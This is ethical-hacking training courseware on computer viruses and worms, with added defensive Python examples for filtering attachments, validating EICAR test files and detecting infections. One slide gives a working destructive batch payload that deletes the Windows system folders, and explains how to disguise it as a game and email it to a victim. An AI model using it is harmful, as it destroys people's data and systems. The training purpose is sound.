8/14/2019 16 Virus and Worms
1/85
Module XVI: Virus and Worms
Ethical Hacking Version 5
EC-Council. Copyright by EC-Council.
All Rights reserved. Reproduction is strictly prohibited
Case Study
Module Objective
This module will familiarize you with the following:
- Virus
- History of Virus
- Different characteristics and types of virus
- Basic symptoms of virus-like attack
- Difference between Virus and Worm
- Virus Hoaxes
- Indications of virus attacks
- Basic working and access methods of virus
- Various damages caused by virus
- Life cycle of virus
- Virus Infection
- Various virus detection techniques
- Top ten virus of 2005
- Virus incident response
Module Flow
- Introduction to Virus
- Characteristics and Types of virus
- Symptoms of Virus attack
- Access methods of virus
- Indications of Virus Attack
- Virus Hoaxes
- Life cycle of virus
- Virus Infection
- Writing a sample Virus code
- Virus Detection and Defenses
- Anti-Virus Software
- Virus incident response
Introduction to Virus
- Computer viruses are perceived as a threat to both business and personnel
- A virus is a self-replicating program that produces its own code by attaching copies of itself to other executable code
- It operates without the knowledge or desire of the computer user
Virus History
Year of Discovery   Virus Name
1981                Apple II Virus - First Virus in the wild
1983                First Documented Virus
1986                Brain, PC-Write Trojan, & Virdem
1989                AIDS Trojan
1995                Concept
1998                Strange Brew & Back Orifice
1999                Melissa, Corner, Tristate, & Bubbleboy
2003                Slammer, Sobig, Lovgate, Fizzer, Blaster/Welchia/Mimail
2004                I-Worm.NetSky.r, I-Worm.Bagle.au
2005                Email-Worm.Win32.Zafi.d, Net-Worm.Win32.Mytob.t
Characteristics of a Virus
- Resides in the memory and replicates itself while the program to which it is attached is running
- Does not reside in the memory after the execution of the program
- Can transform itself by changing its code to appear different
- Hides itself from detection in three ways:
  - Encrypts itself into cryptic symbols
  - Alters the disk directory data to compensate for the additional virus bytes
  - Uses stealth algorithms to redirect disk data
Working of Virus
Trigger events and direct attack are the common modes which cause a virus to go off on a target system
Most viruses operate in two phases:
Infection Phase:
- Virus developers decide when to infect host system programs
- Some infect each time they are run and executed completely (Ex: Direct Viruses)
- Some virus codes infect only when users trigger them, which may include a day, time, or a particular event (Ex: TSR viruses, which get loaded into memory and infect at later stages)
Attack Phase:
- Some viruses have trigger events to activate and corrupt systems
- Some viruses have bugs which replicate and perform activities like file deletion or increasing session time
- They corrupt the targets only after spreading completely, as intended by their developers
Working of Virus: Infection Phase
[Diagram: an .EXE file before infection and after infection. Labels: File Header, IP (instruction pointer), Start of Program, End of Program, Virus, Jump. Caption: Attaching .EXE File to Infect the Programs]
Working of Virus: Attack Phase
[Diagram (Source: www.microsoft.com): an unfragmented file before attack (File A and File B, pages 1-3 each stored contiguously) compared with file fragmentation due to virus attack (pages of File A and File B interleaved on disk). Caption: Slowdown of PC due to Fragmented Files]
Why Do People Create Computer Viruses?
Virus writers can have various reasons for creating and spreading malware
Viruses have been written as:
- Research projects
- Pranks
- Vandalism
- To attack the products of specific companies
- To distribute political messages
- Financial gain
- Identity theft
- Spyware
- Cryptoviral extortion
Symptoms of Virus-Like Attack
If the system acts in an unprecedented manner, you can suspect a virus attack
Example: Processes take more resources and are time consuming
However, not all glitches can be attributed to virus attacks. Examples include:
- Certain hardware problems
- If the computer beeps with no display
- If only one out of two anti-virus programs reports a virus on the system
- If the label of the hard drive changes

- Your computer freezes frequently or encounters errors
- Your computer slows down when programs are started
- You are unable to load the operating system
- Files and folders are suddenly missing or their content changes
- Your hard drive is accessed too often (the light on your main unit flashes rapidly)
- Microsoft Internet Explorer "freezes"
- Your friends mention that they have received messages from you but you never sent such messages
Virus Hoaxes
- Hoaxes are false alarms claiming reports about a non-existent virus
- Warning messages propagate that a certain email message should not be viewed and that doing so will damage one's system
- In some cases, these warning messages themselves contain virus attachments
- They possess the capability of vast destruction on target systems
- Being largely misunderstood, viruses easily generate myths. Most hoaxes, while deliberately posted, die a quick death because of their outrageous content
Chain Letters
How is a Worm different from a Virus?
- There is a difference between general viruses and worms
- A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs
- A worm spreads through the infected network automatically, but a virus does not
Indications of Virus Attack
Indications of a virus attack:
- Programs take longer to load than normal
- Computer's hard drive constantly runs out of free space
- Files have strange names which are not recognizable
- Programs act erratically
- Resources are used up easily
Hardware Threats
Power Faults:
- Sudden power failure, voltage spikes, brownouts and frequency shifts cause damage to the system
System Life:
- The system gets worn out over a period of time
Equipment Incompatibilities:
- These occur due to improperly installed devices
Typos:
- Data gets corrupted due to deletion or replacement of the wrong files
Accidental or Malicious Damage:
- Data gets deleted or changed accidentally or intentionally by another person
Problems with Magnets:
- Magnetic fields from floppy disks, monitors, and telephones can damage stored data
Software Threats
Software Problems:
- In a multitasking environment, software conflicts may occur due to sharing of data by all running programs at the same time
- There may be damage to information due to misplacement of data in a program
Software Attacks:
- Intentionally launched malicious programs enable the attacker to use the computer in an unauthorized manner
- General Categories:
  - Viruses and worms
  - Logic bombs
  - Trojans
Virus Damage
Virus damage can be grouped broadly under:
Technical Attributes: The technicalities involved in the modeling and use of a virus cause damage due to:
- Lack of control
- Difficulty in distinguishing the nature of the attack
- Draining of resources
- Presence of bugs
- Compatibility problems
Virus Damage (contd.)
Virus damage can be further attributed to:
Ethical and Legal Reasons: There are ethics and legalities that rule why viruses and worms are damaging:
- Unauthorized data modification
- Issue of Copyright
- Misuse of the virus
- Misguidance by virus writers
Psychological Reasons: These are:
- Trust Problems
- Negative influence
Modes of Virus Infection
Viruses infect the system in the following ways:
1. Loads itself into memory and checks for executables on the disk
2. Appends the malicious code to a legitimate program unbeknownst to the user
3. Since the user is unaware of the replacement, he/she launches the infected program
4. As a result of the infected program being executed, other programs get infected as well
5. The above cycle continues until the user realizes the anomaly within the system
Stages of Virus Life
A computer virus goes through various stages, right from its design to elimination:
- Design: Developing virus code using programming languages or construction kits
- Replication: The virus first replicates for a long period of time within the target system and then spreads itself
- Launch: It gets activated when the user performs certain actions, like triggering or running an infected program
- Detection: A virus is identified as a threat infecting target systems
- Incorporation: Anti-virus software developers assimilate defenses against the virus
- Elimination: Users are advised to install anti-virus software updates, thus creating awareness among user groups
Virus Classification
Viruses are classified based on the following criteria:
- What they Infect
- How they Infect
How does a Virus Infect?
Stealth Virus:
- Can hide from anti-virus programs
Polymorphic Virus:
- Can change its characteristics with each infection
Cavity Virus:
- Maintains the same file size while infecting
Tunneling Virus:
- Hides itself under anti-virus programs while infecting
Camouflage Virus:
- Disguises itself as a genuine application of the user
Storage Patterns of a Virus
Shell Virus:
- Virus code forms a shell around the target host program's code, making itself the original program and the host code its sub-routine
Add-on Virus:
- Appends its code at the beginning of the host code without making any changes to the latter
Intrusive Virus:
- Overwrites the host code partly or completely with viral code
Direct or Transient Virus:
- Transfers all control to the host code where it resides
- Selects the target program to be modified and corrupts it
Terminate and Stay Resident Virus (TSR):
- Remains permanently in memory during the entire work session, even after the target host program is executed and terminated
- Can be removed only by rebooting the system
System Sector Viruses
- System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC
- System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses
- These boot viruses use all of the common viral techniques to infect and hide themselves
- They rely on an infected floppy disk left in the drive when the computer starts; they can also be "dropped" by some file infectors or Trojans
Stealth Virus
- These viruses evade anti-virus software by intercepting its requests to the operating system
- A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus instead of the OS
- The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is "clean"
[Diagram: the anti-virus software asks "Give me the system file tcpip.sys to scan"; the virus intercepts the request and answers "Here you go" with the original TCPIP.SYS, while the infected TCPIP.SYS stays on disk]
Bootable CD-ROM Virus
- These are a new type of virus that destroys the hard disk data content when the computer is booted with the infected CD-ROM
- Example: Someone might give you a LINUX BOOTABLE CD-ROM. When you boot the computer using the CD-ROM, all your data is gone
- No anti-virus can stop this because the AV software or the OS is not even loaded when you boot from a CD-ROM
[Diagram: boot your computer using the infected virus CD-ROM; your C: drive data is destroyed]
Self-Modification
- Most modern antivirus programs try to find virus patterns inside ordinary programs by scanning them for virus signatures
- A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses
- Self-modifying viruses employ techniques that make detection by means of signatures difficult or impossible
- These viruses modify their code on each infection (each infected file contains a different variant of the virus)
[Diagram: infected files Explorer.exe, sales.jpg and Purchase.pdf, each carrying a different variant]
Encryption with a Variable Key
- This type of virus uses simple encryption to encipher the code
- The virus is encrypted with a different key for each infected file
- AV scanners cannot directly detect these types of viruses using signature detection methods
[Diagram: Virus.exe alongside Virus.exe (encrypted)]
Polymorphic Code
- Polymorphic code is code that mutates while keeping the original algorithm intact
- To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine)
- A well-written polymorphic virus therefore has no parts that stay the same on each infection
Metamorphic Virus
- Metamorphic viruses rewrite themselves completely each time they are to infect new executables
- Metamorphic code is code that can reprogram itself by translating its own code into a temporary representation, and then back to normal code again
- For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it part of the metamorphic engine
Cavity Virus
A cavity virus overwrites a part of the host file that is filled with a constant (usually nulls), without increasing the length of the file, but preserving its functionality
[Diagram: a block of null bytes inside a host file is overwritten with the virus; Original File Size: 45 KB, Infected File Size: 45 KB]
Sparse Infector Virus
- A sparse infector virus infects only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range
- By infecting less often, such viruses try to minimize the probability of being discovered
[Diagram: "Wake up on the 15th of every month and execute code"]
Companion Virus
- A companion virus creates a companion file for each executable file the virus infects
- Therefore a companion virus may save itself as notepad.com, and every time a user executes notepad.exe (the good program), the computer will load notepad.com (the virus) and therefore infect the system
[Diagram: the virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory, beside Notepad.exe]
File Extension Virus
- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT
- If you've forgotten that extensions are actually turned off, you might think this is a text file and open it
- This is really an executable Visual Basic Script virus file and could do serious damage
- The countermeasure is to turn off "Hide file extensions" in Windows
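As an added example, not part of the EC-Council courseware, the Python check below applies the slide's point on the receiving side: it splits an attachment name into all of its extensions, works out what Explorer would display with known extensions hidden, and blocks a name whose real (last) extension is executable while the extension in front of it reads like a document. The sample names are constructed from this module's own examples; the two extension lists are this example's assumptions, not a published standard.

```python
import os

# Extensions that Windows runs as programs or scripts; a file ending in one
# of these is executable no matter how the rest of its name reads.
EXECUTABLE_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
                         ".exe", ".com", ".bat", ".cmd", ".scr", ".pif"}

# Extensions a user reads as "harmless document". With known extensions
# hidden, BAD.TXT.VBS is displayed as BAD.TXT, so the .TXT does the lying.
DOCUMENT_EXTENSIONS = {".txt", ".doc", ".rtf", ".jpg", ".jpeg", ".gif",
                       ".pdf", ".xls", ".htm", ".html"}


def split_extensions(filename):
    """Return every dot-separated extension of a file name, lower-cased.

    'LOVE-LETTER-FOR-YOU.TXT.vbs' -> ['.txt', '.vbs']
    """
    base = os.path.basename(filename)
    parts = [p.strip() for p in base.split(".")]
    return ["." + p.lower() for p in parts[1:]]


def displayed_name(filename):
    """What Explorer shows when 'Hide extensions for known file types' is on:
    only the final extension is dropped, so BAD.TXT.VBS appears as BAD.TXT."""
    root, _real_ext = os.path.splitext(os.path.basename(filename))
    return root


def classify_attachment(filename):
    """Triage one attachment name.

    'allow'      - not an executable type
    'quarantine' - executable, named honestly (e.g. VeryFunny.vbs)
    'block'      - executable disguised with a document extension in front
    """
    exts = split_extensions(filename)
    if not exts or exts[-1] not in EXECUTABLE_EXTENSIONS:
        return "allow"
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS:
        return "block"
    return "quarantine"


def triage(filenames):
    """Map each attachment name to its verdict and the name a user would see."""
    return {name: (classify_attachment(name), displayed_name(name))
            for name in filenames}


# Constructed sample names, taken from the examples in this module.
SAMPLE_ATTACHMENTS = [
    "BAD.TXT.VBS",
    "LOVE-LETTER-FOR-YOU.TXT.vbs",
    "virus_warning.jpg.vbs",
    "VeryFunny.vbs",
    "protect.vbs",
    "LIST.DOC",
    "report.txt",
]

if __name__ == "__main__":
    for name, (verdict, shown) in triage(SAMPLE_ATTACHMENTS).items():
        print(f"{name:32} shown as {shown:28} -> {verdict}")
```

LIST.DOC from the Melissa slide passes this check: it is a document, and the macro risk inside it is a separate control (macro security settings and content scanning), which is why a name-based filter is a first gate rather than the whole defense. The Explorer option the slide calls "Hide file extensions" is the HideFileExt value under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced; setting it to 0 shows extensions.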
Famous Viruses /Worms
I Love You Virus
- Love Letter is a Win32-based email worm. It overwrites certain files on the hard drives and sends itself out to everyone in the Microsoft Outlook address book
- Love Letter arrives as an email attachment named LOVE-LETTER-FOR-YOU.TXT.VBS, though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs, and protect.vbs
- The viruses discussed here are more of a proof of concept, as they have been instrumental in the evolution of both virus and anti-virus programs
Classic tool presented here for proof of concept
Melissa Virus
- Melissa is a Microsoft Word macro virus. Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in the address book
- It does not corrupt any data on the hard drive or crash the computer. However, it affects MS Word settings
- Melissa arrives as an email attachment. The subject of the message containing the virus reads: "Important message from" followed by the name of the person whose email account it was sent from
- The body of the message reads: "Here's the document you asked for...don't show anyone else ;-)". Double-clicking the attached Word document (typically named LIST.DOC) will infect the machine
Classic tool presented here for proof of concept
Melissa Virus Case
JS.Spth
- JavaScript Internet worm
- Propagates via email, ICQ and P2P networks
- Kit-Spth is used to produce the JS/SPTH worm
Infection Strategies:
- Ms-OutLook
- Morpheus
- Grokster
- MIrc
- pIrc
- vIrc
- Kazaa
- Kazaa-Lite
- Bear Share
- symLink
Klez Virus Analysis - 1
- Klez virus arrives as an email attachment that automatically runs when viewed or previewed in Microsoft Outlook or Outlook Express
- It is a memory-resident mass-mailing worm that uses its own SMTP engine to propagate via email
- Its email messages arrive with randomly selected subjects
- It spoofs its email messages so that they appear to have been sent by certain email accounts, including accounts that are not infected
Klez Virus Analysis - 2
Klez Virus arrives via E-Mail
Klez Virus Analysis - 4
Autorun Techniques
- This worm creates the following registry entry so that it executes at every Windows startup:
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (value name: Winkabc)
- It registers itself as a process so that it is invisible on the Windows Taskbar
- On Windows 2000 and XP, it sets itself as a service by creating the following registry entry:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winkabc
Klez Virus Analysis - 5
Payload
Once the victim's computer is infected, the Klez virus starts propagating itself to other users through the Microsoft Outlook contact list
[Diagram: the Klez virus mailing itself from the infected machine to the addresses in the contact list]
Writing a Simple Virus Program
1. Create a batch file Game.bat with the following text
@ echo off
del c:\winnt\system32\*.*
del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Send the Game.com file as an email attachment to a victim
4. When the victim runs this program, it deletes core files in the WINNT directory, making Windows unusable
Writing a Test Virus Program
Sometimes it is unacceptable for you to send out real viruses to your network for test or demonstration purposes
EICAR.ORG has created a test virus definition that is harmless and will be picked up by every AV program
Type the following text in Notepad and save the file as eicar.com:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
This file, eicar.com, will be detected as a virus by your AV
You can also download this test virus from http://www.eccouncil.org/cehtools/eicar.zip
Note: This slide is not in your courseware
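Added example, not from the courseware: a Python helper that builds the EICAR test file from the string above and validates a file against EICAR's own rules, so that a "my scanner did not fire" result can be told apart from a mistyped test file. The rules encoded here are EICAR's (the 68-byte string must come first, it may be followed only by whitespace, and the file is at most 128 bytes); the SHA-256 is of the bare 68-byte string. The file name eicar.com is the slide's; nothing else here is taken from the page.

```python
import hashlib
import os

# The EICAR standard anti-virus test string, exactly as given on the slide
# (68 ASCII characters). Run as a .COM program it only prints its own name.
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Per the EICAR specification a test file is the 68-byte string, optionally
# followed only by whitespace (space, tab, LF, CR, CTRL-Z), at most 128 bytes.
ALLOWED_TRAILER = frozenset(b" \t\r\n\x1a")
MAX_SIZE = 128


def eicar_bytes() -> bytes:
    return EICAR.encode("ascii")


def is_valid_eicar(data: bytes) -> bool:
    """True if data is an EICAR test file that a conforming scanner must detect."""
    body = eicar_bytes()
    if len(data) > MAX_SIZE or not data.startswith(body):
        return False
    return all(b in ALLOWED_TRAILER for b in data[len(body):])


def eicar_sha256() -> str:
    """SHA-256 of the bare 68-byte string, for matching quarantine logs."""
    return hashlib.sha256(eicar_bytes()).hexdigest()


def write_eicar(path: str) -> int:
    """Write eicar.com for a controlled detection test; returns bytes written.
    A working resident scanner should quarantine it at once, which is the point."""
    with open(path, "wb") as fh:
        return fh.write(eicar_bytes())


def check_file(path: str) -> str:
    """Report whether a file on disk still is a valid EICAR test file."""
    if not os.path.exists(path):
        return "missing (quarantined or deleted by AV?)"
    with open(path, "rb") as fh:
        return "valid EICAR" if is_valid_eicar(fh.read()) else "not a valid EICAR file"


if __name__ == "__main__":
    print(len(EICAR), "bytes, sha256", eicar_sha256())
    write_eicar("eicar.com")
    print(check_file("eicar.com"))
```

Editors that add a UTF-8 byte-order mark or wrap the line will produce a file that fails `is_valid_eicar`, and a scanner is within the specification in ignoring it; check the file before concluding the AV is broken.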
Virus Construction Kits
- Virus creation programs and construction kits can automatically generate viruses
- There are a number of virus construction kits available in the wild
- Some virus construction kits are:
  - Kefi's HTML Virus Construction Kit
  - Virus Creation Laboratory v1.0
  - The Smeg Virus Construction Kit
  - Rajaat's Tiny Flexible Mutator v1.1
  - Windows Virus Creation Kit v1.00
Examples of Virus Construction Kits
Virus Detection Methods
Scanning:
- Once a virus has been detected, it is possible to write scanning programs that look for a signature string characteristic of the virus
Integrity Checking:
- Integrity checking products work by reading your entire disk and recording integrity data that acts as a signature for the files and system sectors
Interception:
- The interceptor monitors operating system requests that write to disk
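The three methods on this slide, plus the X.COM-beside-X.EXE pattern from the Companion Virus slide, as an added Python example that is not part of the courseware. It runs against a constructed in-memory "disk" with a constructed signature for a made-up sample; none of the paths, names or byte strings refer to a real virus.

```python
import hashlib
from typing import Dict, List

# Constructed in-memory "disk" (path -> contents) standing in for a volume,
# so the three methods on the slide can be exercised offline.
CLEAN_DISK: Dict[str, bytes] = {
    "C:/WINNT/SYSTEM32/NOTEPAD.EXE": b"MZ\x90\x00 constructed notepad code",
    "C:/WINNT/SYSTEM32/CALC.EXE":    b"MZ\x90\x00 constructed calc code",
    "C:/DOCS/REPORT.TXT":            b"quarterly numbers",
}

# Constructed signature for a made-up sample, not a real virus: the byte
# string a scanner searches for once the sample has been analysed.
SIGNATURES: Dict[str, bytes] = {"Example.Virus.A": b"VIRUS_JUMP_STUB"}


def scan(disk: Dict[str, bytes], signatures: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Scanning: report which known signatures occur in which files."""
    hits = {}
    for path, data in disk.items():
        found = sorted(name for name, sig in signatures.items() if sig in data)
        if found:
            hits[path] = found
    return hits


def baseline(disk: Dict[str, bytes]) -> Dict[str, str]:
    """Integrity checking, step 1: record a SHA-256 per file as its fingerprint."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in disk.items()}


def integrity_check(disk: Dict[str, bytes], base: Dict[str, str]) -> Dict[str, List[str]]:
    """Integrity checking, step 2: diff the current disk against the baseline."""
    now = baseline(disk)
    return {
        "modified": sorted(p for p in base if p in now and now[p] != base[p]),
        "new": sorted(p for p in now if p not in base),
        "deleted": sorted(p for p in base if p not in now),
    }


def companion_check(disk: Dict[str, bytes]) -> List[str]:
    """Flag X.COM sitting beside X.EXE (the companion-virus pattern)."""
    names = {p.upper() for p in disk}
    return sorted(p for p in names
                  if p.endswith(".COM") and p[:-4] + ".EXE" in names)


class Interceptor:
    """Interception: sits in front of write requests and refuses writes to
    executables and system files unless an administrator approves them."""
    PROTECTED = (".EXE", ".COM", ".SYS")

    def __init__(self, disk: Dict[str, bytes]):
        self.disk = disk
        self.blocked: List[str] = []

    def write(self, path: str, data: bytes, approved: bool = False) -> bool:
        if path.upper().endswith(self.PROTECTED) and not approved:
            self.blocked.append(path)
            return False
        self.disk[path] = data
        return True


def demo() -> dict:
    disk = dict(CLEAN_DISK)
    base = baseline(disk)
    guard = Interceptor(disk)
    calc = "C:/WINNT/SYSTEM32/CALC.EXE"
    # A write that goes through the monitored OS path is refused outright.
    allowed = guard.write(calc, disk[calc] + b"VIRUS_JUMP_STUB")
    # Changes that never pass through the monitored path are not stopped,
    # but the scanner and the integrity checker still see them afterwards.
    disk["C:/WINNT/SYSTEM32/NOTEPAD.EXE"] += b"VIRUS_JUMP_STUB"
    disk["C:/WINNT/SYSTEM32/NOTEPAD.COM"] = b"constructed companion"
    return {
        "write_allowed": allowed,
        "blocked": list(guard.blocked),
        "scan": scan(disk, SIGNATURES),
        "integrity": integrity_check(disk, base),
        "companions": companion_check(disk),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Each method has the limit the earlier slides describe: scanning only finds signatures it already knows, so self-modifying, variably encrypted and polymorphic code defeat it; integrity checking reports that a file changed but not why, and is only as good as the baseline taken on a known-clean system; interception only sees writes that pass through the monitored path. A stealth virus that sits between the scanner and the OS, as on the Stealth Virus slide, hands both the scanner and the hashing routine the clean copy, which is why a scan from known-clean boot media is the check of record.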
Virus Incident Response
1. Detect the attack: Not all anomalous behavior can be attributed to viruses
2. Trace processes using utilities such as handle.exe, listdlls.exe, fport.exe, netstat.exe, pslist.exe, and map commonalities between affected systems
3. Detect the virus payload by looking for altered, replaced, or deleted files. New files, changed file attributes, or shared library files should be checked
4. Acquire the infection vector, isolate it. Update anti-virus and rescan all systems
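Step 2 above, mapping commonalities between affected systems, as an added Python example that is not the courseware's: it parses TCP listeners out of `netstat -ano` output, joins them to a pid-to-image map of the kind pslist gives, and reports the (port, process) pairs that appear on every affected host and on no clean host. PIDs differ from machine to machine, so the comparison is made on port and image name. The host data is constructed and suspect.exe is a placeholder name, not a real sample.

```python
import re
from typing import Dict, List, Set, Tuple

# One TCP listener line of Windows `netstat -ano` output, for example:
#   TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1312
LISTENER = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def listening_ports(netstat_output: str) -> Set[Tuple[int, int]]:
    """Return {(local_port, owning_pid)} for every TCP socket in LISTENING state."""
    found = set()
    for line in netstat_output.splitlines():
        m = LISTENER.match(line)
        if m:
            found.add((int(m.group(1)), int(m.group(2))))
    return found


def port_owners(netstat_output: str, processes: Dict[int, str]) -> Set[Tuple[int, str]]:
    """Join listeners to image names (pslist gives the pid -> name map)."""
    return {(port, processes.get(pid, f"pid {pid}"))
            for port, pid in listening_ports(netstat_output)}


def suspicious_commonalities(hosts, affected: List[str], clean: List[str]) -> Set[Tuple[int, str]]:
    """(port, process) pairs present on every affected host and on no clean host."""
    shared = None
    for name in affected:
        owners = port_owners(hosts[name]["netstat"], hosts[name]["processes"])
        shared = owners if shared is None else shared & owners
    shared = shared or set()
    for name in clean:
        shared -= port_owners(hosts[name]["netstat"], hosts[name]["processes"])
    return shared


# Constructed sample data in the shape of `netstat -ano` output plus a
# pid -> image name map per host. Two hosts show symptoms, one is clean.
HOSTS = {
    "ws-a": {"netstat": """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1312
  TCP    10.0.0.5:139           0.0.0.0:0              LISTENING       4
  TCP    10.0.0.5:1029          10.0.0.9:25            ESTABLISHED     1312
""", "processes": {4: "System", 872: "svchost.exe", 1312: "suspect.exe"}},
    "ws-b": {"netstat": """
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2040
""", "processes": {4: "System", 880: "svchost.exe", 2040: "suspect.exe"}},
    "ws-clean": {"netstat": """
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       868
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
""", "processes": {4: "System", 868: "svchost.exe"}},
}

if __name__ == "__main__":
    print(suspicious_commonalities(HOSTS, ["ws-a", "ws-b"], ["ws-clean"]))
```

The clean host matters as much as the affected ones: without it, ports 135 and 445 and their svchost.exe/System owners would be reported too, since every Windows host has them. The ESTABLISHED connection to port 25 on ws-a is deliberately ignored by the listener parser; it belongs with step 3, where the SMTP traffic from suspect.exe is the payload evidence.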
What is Sheep Dip ?
- Slang term for a computer which connects to a network only under strictly controlled conditions, and is used for the purpose of running anti-virus checks on suspect files, incoming messages and so on
- It may be inconvenient and time-consuming for organizations to give all incoming email attachments a 'health check', but the rapid spread of macro-viruses associated with word processor and spreadsheet documents, such as the 'Resume' virus circulating in May 2000, makes this approach worthwhile
Sheep Dip Computer
[Diagram: Run Port Monitor, Run File Monitor, Run Registry Monitor, Run Network Monitor; run the virus in this monitored environment]
Virus Analysis: IDA Pro Tool
- It is a disassembler and debugger tool that supports both Windows and Linux platforms
- It is an interactive, programmable, extendible, multi-processor disassembler
- Used in the analysis of hostile code, vulnerability research and software reverse engineering
- Allows automated unpacking/decrypting of protected binaries
IDA Pro (Virus Disassembler)
Prevention is Better than Cure
- Do not accept disks or programs without checking them first using a current version of an anti-viral program
- Do not leave a floppy disk in the disk drive longer than necessary
- Do not boot the machine with a disk in the disk drive, unless it is a known clean bootable system disk
- Keep the anti-virus software up-to-date: upgrade on a regular basis
Latest Viruses
W32/Vulgar:
- Overwriting virus with a data-destructive payload
- Attempts to open the default web browser after execution, but results in Internet Explorer crashing
W32/Feebs.gen@MM:
- Email worm type virus that configures itself to load at startup
- Spreads itself by email attachment and infects the system after execution of the attachment
W32/HLLP.zori.c@M:
- Parasitic file infector and mailing worm
- Possesses backdoor functionality that allows unauthorized remote access
Top 10 Viruses- 2006
- Email-Worm.Win32.Zafi.d
- Net-Worm.Win32.Mytob.c
- Email-Worm.Win32.LovGate.w
- Email-Worm.Win32.Sober.v
- Email-Worm.Win32.Zafi.b
- Email-Worm.Win32.NetSky.b
- Email-Worm.Win32.NetSky.g
- Net-Worm.Win32.Mytob.t
- Net-Worm.Win32.Mytob.u
- Net-Worm.Win32.Mytob.g
Anti-Virus Software
There are many anti-virus software vendors. Here is a list of some freely available anti-virus software for personal use:
- AVG Free Edition
- Norton Antivirus
- AntiVir Personal Edition
- Bootminder
- Panda Active Scan
One of the preventions against viruses is to install anti-virus software and keep the updates current
AVG Antivirus
Product of www.grisoft.com
Menus in Basic Interface:
- Program menu
- Tests menu
- Results menu
- Service menu
- Information menu
AVG Settings and Features:
- Program settings
- Test properties
- Test results
- Task scheduler
- Update manager
Norton Antivirus
Product of www.symantec.com
Features:
- Protects from viruses, and updates virus definitions automatically
- Detects and repairs viruses in emails, instant messenger attachments and compressed folders
- Monitors network traffic for malicious activity
Norton antivirus provides the following scan options:
- Full system scan
- Custom scan
- Schedule scan
- Scan from the command line
McAfee
Product of www.mcafee.com
Features:
- SpamKiller: Stops spam from infecting the inbox
- SecurityCenter: Lists computer security vulnerabilities; offers free real-time security alerts
- VirusScan:
  - ActiveShield: Scans the files in real time
  - Quarantine: Encrypts the infected files in the quarantine folder
  - Hostile Activity Detection: Examines the computer for malicious activity
McAfee SpamKiller
McAfee SecurityCenter
McAfee VirusScan
Socketshield
SocketShield is a zero-day exploit blocker
SocketShield can block exploits from entering the computer, regardless of how long it takes for the vendors of vulnerable applications to issue patches
http://www.explabs.com
Popular Anti-Virus Packages
- Aladdin Knowledge Systems: http://www.esafe.com/
- Central Command, Inc.: http://www.centralcommand.com/
- Computer Associates International, Inc.: http://www.cai.com
- Frisk Software International: http://www.f-prot.com/
- F-Secure Corporation: http://www.f-secure.com
- Trend Micro, Inc.: http://www.trendmicro.com
- Norman Data Defense Systems: http://www.norman.com
- Panda Software: http://www.pandasoftware.com/
- Proland Software: http://www.pspl.com
- Sophos: http://www.sophos.com
Virus Databases
The following databases can be useful if you are looking for specific information about a particular virus:
- Proland - Virus Encyclopedia: http://www.pspl.com/virus_info/
- Norman - Virus Encyclopedia: http://www.norman.com/Virus/en-us
- AVG - Virus Encyclopedia: http://www.grisoft.com/doc/Virus+Encyclopaedia/lng/us/tpl/tpl01
- Virus Bulletin - Virus Encyclopedia: https://www.virusbtn.com/login
- F-Secure Virus Info Center: http://www.f-secure.com/vir-info/
- McAfee - Virus Information Library: http://vil.mcafee.com/
- Panda Software - Virus Encyclopedia: http://www.pandasoftware.com/library/
- Sophos Virus Information: http://www.sophos.com/virusinfo/
- Symantec AntiVirus Research Center: http://www.symantec.com/avcenter/index.html
- Trend Micro - Virus Encyclopedia: http://www.antivirus.com/vinfo/virusencyclo/default.asp
What Happened Next?
The next day, when he switched on his system, Ricky was surprised at the irregular behavior of his system. His system was hanging frequently and strange error messages were popping up. He suspected a virus attack on his system. He updated his anti-virus software, which he had not updated for a long time, and scanned the system. The scan result showed that his system was infected by a deadly virus.
Summary
- Viruses come in different forms
- Some are mere nuisances, others come with devastating consequences
- Email worms are self-replicating, and clog networks with unwanted traffic
- Virus codes are not necessarily complex
- It is necessary to scan the systems/networks for infections on a periodic basis for protection against viruses
- Antidotes to new virus releases are promptly made available by security companies, and this forms the major countermeasure